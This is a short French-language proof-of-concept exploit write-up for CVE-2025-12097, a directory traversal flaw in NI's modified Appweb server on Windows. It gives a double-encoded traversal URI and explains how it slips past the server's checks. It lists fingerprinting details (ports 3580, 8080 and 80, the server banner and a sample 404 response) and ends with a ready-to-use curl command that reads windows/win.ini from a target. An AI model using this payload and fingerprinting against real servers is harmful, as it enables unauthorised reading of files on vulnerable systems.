
Exploit de preuve de concept pour CVE-2025-12097, une vulnérabilité de traversée de répertoire dans le serveur Appweb modifié par NI permettant la lecture arbitraire de fichiers sur les systèmes Windows.
La modification NI du serveur Appweb contient une vulnérabilité de traversée de répertoire qui permet à un attaquant de lire des fichiers arbitraires sur le serveur.
Le chemin URI /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini sera converti en :
pathInfo cchar * "/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/windows/win.ini” 0x000000010076f808 ce qui est un URI valide et appweb ne bloque pas cette requête. Celle-ci est ensuite transmise à un gestionnaire personnalisé qui, dans ce cas, renvoie le contenu de tout fichier demandé.
En raison de la nature du logiciel affecté, les appareils impactés sont exclusivement des systèmes Microsoft Windows.
Version vulnérable la plus élevée observée : 12.0.0.
Les appareils affectés peuvent être identifiés par les caractéristiques suivantes :
Pas toujours présent, mais dans la plupart des cas, le service s'exécute sur le port 3580 ; d'autres ports peuvent inclure 8080 et 80.
Réponse du serveur à /
HTTP/1.1 404 Not Found
Server: Mbedthis-Appweb/2.5.0
Date: Thu, 11 Dec 2025 18:23:26 GMT
Connection: keep-alive
Keep-Alive: timeout=60000, max=100
Content-Type: text/html
Content-length: 126
<HTML><HEAD><TITLE>Document Error: Not Found</TITLE></HEAD>
<BODY><H2>Access Error: 404 -- Not Found</H2>
</BODY></HTML>
Pour exploiter cette vulnérabilité, vous pouvez utiliser la commande suivante :
curl http://<TARGET>:3580/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini
Vous verrez le contenu du fichier win.ini si la cible est vulnérable.